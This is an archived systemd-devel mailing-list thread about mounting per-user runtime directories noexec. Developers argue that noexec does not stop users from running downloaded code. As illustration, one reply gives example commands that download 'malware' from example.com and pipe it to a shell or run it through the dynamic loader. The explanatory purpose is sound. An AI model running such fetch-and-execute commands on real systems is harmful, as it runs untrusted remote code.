Re: [systemd-devel] Mount options of /var/run/users/pid
Thanks to all. I solved my problem with pam_exec for /etc/pam.d/login, /etc/pam.d/gdm-password by adding:

    session required pam_exec.so /sbin/resources

/sbin/resources:

    #!/bin/bash
    # Remount the per-user runtime directory with noexec at session start
    mount "$XDG_RUNTIME_DIR" -o remount,noexec

I consider this thread closed.

___
systemd-devel mailing list
systemd-devel@lists.freedesktop.org
http://lists.freedesktop.org/mailman/listinfo/systemd-devel
Re: [systemd-devel] Mount options of /var/run/users/pid
On Mon, 16.02.15 22:14, Павел Самсонов (pvsamsono...@gmail.com) wrote:

> If I have multiuser Linux installation with shell and DE access, my users
> have not places in system, where they able download something from
> internet and execute:
> / ro,exec
> /home rw,noexec
> /var rw,noexec
> All tmpfs noexec
> In Debian wheezy this done and work. In Debian jessie I have places
> (/run/users/*), where users may execute downloaded executables. What I
> must do with this?

As mentioned already. We do not support mounting /run/user/* with other mount options, and this is unlikely to change.

What you are trying to do does not provide any security (as discussed in this thread otherwise), and thus this is something we are unlikely to consider to support.

Sorry,

Lennart

-- 
Lennart Poettering, Red Hat
Re: [systemd-devel] Mount options of /var/run/users/pid
On 16/02/15 18:14, Павел Самсонов wrote:

> If I have multiuser Linux installation with shell and DE access, my users
> have not places in system, where they able download something from
> internet and execute:
> ...
> /home rw,noexec

noexec is not sufficient to do what you have said. For instance, your users could do any of these:

    wget http://example.com/malware.sh
    /bin/sh malware.sh

    wget -O - http://example.com/malware.sh | /bin/sh

    wget http://example.com/malware.x86.bin
    /lib/ld-linux.so.2 malware.x86.bin

(Or replace /bin/sh with Python, Perl etc., or the x86 executable with any architecture your machine can run.)

Users who can execute arbitrary code with their own privileges, and obtain arbitrary files from the Internet, can execute arbitrary code from the Internet with their own privileges.

You are unlikely to be able to avoid this without LSMs. If you use an LSM (AppArmor, SELinux, etc.) and confine your users, you might be able to achieve what you think you have already achieved.

-- 
Simon McVittie
Collabora Ltd. http://www.collabora.com/
Re: [systemd-devel] Mount options of /var/run/users/pid
On 16.02.2015 at 21:02, Mantas Mikulėnas wrote:

> On Mon, Feb 16, 2015 at 9:40 PM, Reindl Harald wrote:
>> On 16.02.2015 at 20:31, Mantas Mikulėnas wrote:
>>> On Mon, Feb 16, 2015 at 9:16 PM, Simon McVittie wrote:
>>>> wget http://example.com/malware.x86.bin
>>>> /lib/ld-linux.so.2 malware.x86.bin
>>>
>>> Pretty sure this no longer works; these days noexec prevents
>>> mmap(PROT_EXEC) as well
>>
>> you should not assume when you can try it simple
>> [...]
>> [root@arrakis:~]$ bash /Volumes/dune/test.sh
>> config-3.18.7-100.fc20.x86_64
>> grub2
>> initramfs-3.18.7-100.fc20.x86_64.img
>> initrd-plymouth.img
>> lost+found
>> System.map-3.18.7-100.fc20.x86_64
>> vmlinuz-3.18.7-100.fc20.x86_64
>
> And you should not reply before you read the actual post, in which I
> specifically reply to a comment about ld-linux.so – not script
> interpreters, which don't rely on this function

the context was about can you prevent a user from execute something with noexec and fact is you can't - period

likely you missed the "wget -O - http://example.com/malware.sh | /bin/sh" in the post explaining it

it's the part you stripped from your quote (maybe not post HTML would have kept it readable)
Re: [systemd-devel] Mount options of /var/run/users/pid
On 16.02.2015 at 20:31, Mantas Mikulėnas wrote:

> On Mon, Feb 16, 2015 at 9:16 PM, Simon McVittie
> simon.mcvit...@collabora.co.uk wrote:
>> wget http://example.com/malware.x86.bin
>> /lib/ld-linux.so.2 malware.x86.bin
>
> Pretty sure this no longer works; these days noexec prevents
> mmap(PROT_EXEC) as well

you should not assume when you can try it simple

frankly we mount most data-partitions noexec even if they contain cronjobs which get the full interpreter and the script path by intention

    [root@arrakis:~]$ mount | grep dune
    /dev/sdf1 on /Volumes/dune type ext4 (rw,noexec,noatime,nodiratime,commit=30,inode_readahead_blks=16)
    [root@arrakis:~]$ touch /Volumes/dune/test.sh
    [root@arrakis:~]$ echo ls /boot/ > /Volumes/dune/test.sh
    [root@arrakis:~]$ bash /Volumes/dune/test.sh
    config-3.18.7-100.fc20.x86_64
    grub2
    initramfs-3.18.7-100.fc20.x86_64.img
    initrd-plymouth.img
    lost+found
    System.map-3.18.7-100.fc20.x86_64
    vmlinuz-3.18.7-100.fc20.x86_64
Re: [systemd-devel] Mount options of /var/run/users/pid
If I have multiuser Linux installation with shell and DE access, my users have not places in system, where they able download something from internet and execute:

    / ro,exec
    /home rw,noexec
    /var rw,noexec
    All tmpfs noexec

In Debian wheezy this done and work. In Debian jessie I have places (/run/users/*), where users may execute downloaded executables. What I must do with this?

Sorry my English.

On 16.02.2015 14:10, user Lennart Poettering lenn...@poettering.net wrote:

> On Sun, 15.02.15 16:31, Павел Самсонов (pvsamsono...@gmail.com) wrote:
>
>> Good day, I see a new Debian jessie, and I mean, that /var/run/pid
>> filesystems must be mounted with noexec options, so they have user write
>> access. On some installations this very important. Where I may configure
>> this, or may be You change your default mount options?
>> Sorry my English, best regards, Pavel, Russia.
>
> I cannot parse this. Do you mean /run/user/uid? /var/run/pid is not a
> separate mount, /run is, and that is not user writable.
>
> The /run/user/uid directory is mounted to implement XDG_RUNTIME_DIR. We
> guarantee certain functionality on it, including the ability to have
> executable files there, and that's specified in the XDG_RUNTIME_DIR spec.
> Hence, the only way to change it is by patching logind, and we will not
> add a configuration option for this, since it would mean XDG_RUNTIME_DIR
> would not provide what it's supposed to provide anymore.
>
> Note though that /run/user/uid is mounted as per-user tmpfs instance,
> with nosuid and nodev, and a size limit applied. It should hence be a
> pretty safe thing.
>
> Also note that noexec doesn't really do what people think it does.
>
> Lennart
>
> --
> Lennart Poettering, Red Hat
Re: [systemd-devel] Mount options of /var/run/users/pid
On Mon, Feb 16, 2015 at 9:16 PM, Simon McVittie simon.mcvit...@collabora.co.uk wrote:

> wget http://example.com/malware.x86.bin
> /lib/ld-linux.so.2 malware.x86.bin

Pretty sure this no longer works; these days noexec prevents mmap(PROT_EXEC) as well.

-- 
Mantas Mikulėnas graw...@gmail.com
Re: [systemd-devel] Mount options of /var/run/users/pid
On Sun, 15.02.15 16:31, Павел Самсонов (pvsamsono...@gmail.com) wrote:

> Good day, I see a new Debian jessie, and I mean, that /var/run/pid
> filesystems must be mounted with noexec options, so they have user write
> access. On some installations this very important. Where I may configure
> this, or may be You change your default mount options?
> Sorry my English, best regards, Pavel, Russia.

I cannot parse this. Do you mean /run/user/uid? /var/run/pid is not a separate mount, /run is, and that is not user writable.

The /run/user/uid directory is mounted to implement XDG_RUNTIME_DIR. We guarantee certain functionality on it, including the ability to have executable files there, and that's specified in the XDG_RUNTIME_DIR spec. Hence, the only way to change it is by patching logind, and we will not add a configuration option for this, since it would mean XDG_RUNTIME_DIR would not provide what it's supposed to provide anymore.

Note though that /run/user/uid is mounted as per-user tmpfs instance, with nosuid and nodev, and a size limit applied. It should hence be a pretty safe thing.

Also note that noexec doesn't really do what people think it does.

Lennart

-- 
Lennart Poettering, Red Hat
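An added example, not part of any message in this thread: a small audit that reads mount entries in /proc/mounts format and reports which /run/user/<uid> mounts lack the options discussed above (nosuid and nodev as described for logind, plus the noexec that the pam_exec remount adds). The policy list, function names and sample lines are assumptions constructed for illustration.

```bash
#!/bin/bash
# Added example: list per-user runtime mounts (/run/user/<uid>) that lack
# expected mount options. Input is in /proc/mounts format:
#   device mountpoint fstype options dump pass

# Assumed policy: nosuid and nodev are what the thread says logind applies;
# noexec is what the pam_exec remount adds.
REQUIRED_OPTS="nosuid nodev noexec"

# audit_runtime_mounts < mounts-file
# Prints "<mountpoint> missing:<opt>[,<opt>...]" per non-compliant mount.
# Returns 0 when every /run/user/<uid> mount is compliant, 1 otherwise.
audit_runtime_mounts() {
    awk -v required="$REQUIRED_OPTS" '
        BEGIN { n = split(required, want, " ") }
        $2 ~ /^\/run\/user\/[0-9]+$/ {
            split("", set)                      # clear the per-line option set
            m = split($4, have, ",")
            for (i = 1; i <= m; i++) set[have[i]] = 1
            missing = ""
            for (i = 1; i <= n; i++)
                if (!(want[i] in set))
                    missing = missing (missing == "" ? "" : ",") want[i]
            if (missing != "") { print $2 " missing:" missing; bad = 1 }
        }
        END { exit (bad ? 1 : 0) }
    '
}

# Constructed sample in /proc/mounts format (not captured from a real host).
sample_mounts() {
    cat <<'EOF'
tmpfs /run tmpfs rw,nosuid,noexec,relatime,size=401000k,mode=755 0 0
tmpfs /run/user/1000 tmpfs rw,nosuid,nodev,relatime,size=204800k,mode=700,uid=1000,gid=1000 0 0
tmpfs /run/user/1001 tmpfs rw,nosuid,nodev,noexec,relatime,size=204800k,mode=700,uid=1001,gid=1001 0 0
/dev/sda2 /home ext4 rw,noexec,relatime 0 0
EOF
}

# Live use: audit_runtime_mounts < /proc/mounts
sample_mounts | audit_runtime_mounts || true
```

The check only reports mount options; as the replies in this thread point out, noexec on its own does not stop interpreters from running files stored on the mount.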
Re: [systemd-devel] Mount options of /var/run/users/pid
On 15.02.2015 at 13:31, Павел Самсонов wrote:

> Good day, I see a new Debian jessie, and I mean, that /var/run/pid
> filesystems must be mounted with noexec options, so they have user write
> access. On some installations this very important. Where I may configure
> this, or may be You change your default mount options?
> Sorry my English, best regards, Pavel, Russia

in case of services you should consider ProtectSystem and ProtectHome which makes /run/user completely inaccessible

normally the service itself has no business to mangle around there

ProtectSystem=
    Takes a boolean argument or full. If true, mounts the /usr directory read-only for processes invoked by this unit. If set to full, the /etc directory is mounted read-only, too. This setting ensures that any modification of the vendor supplied operating system (and optionally its configuration) is prohibited for the service. It is recommended to enable this setting for all long-running services, unless they are involved with system updates or need to modify the operating system in other ways. Note however that processes retaining the CAP_SYS_ADMIN capability can undo the effect of this setting. This setting is hence particularly useful for daemons which have this capability removed, for example with CapabilityBoundingSet=. Defaults to off.

ProtectHome=
    Takes a boolean argument or read-only. If true, the directories /home and /run/user are made inaccessible and empty for processes invoked by this unit. If set to read-only, the two directories are made read-only instead. It is recommended to enable this setting for all long-running services (in particular network-facing ones), to ensure they cannot get access to private user data, unless the services actually require access to the user's private data. Note however that processes retaining the CAP_SYS_ADMIN capability can undo the effect of this setting. This setting is hence particularly useful for daemons which have this capability removed, for example with CapabilityBoundingSet=. Defaults to off.
Re: [systemd-devel] Mount options of /var/run/users/pid
On Sun, Feb 15, 2015 at 04:31:24PM +0400, Павел Самсонов wrote:

> Good day, I see a new Debian jessie, and I mean, that /var/run/pid
> filesystems must be mounted with noexec options, so they have user write
> access. On some installations this very important. Where I may configure
> this, or may be You change your default mount options?
> Sorry my English, best regards, Pavel, Russia.

No, I don't think this can be configured anywhere, since the options are specified somewhere in systemd code. Maybe the options should be changed to be more restrictive.

Zbyszek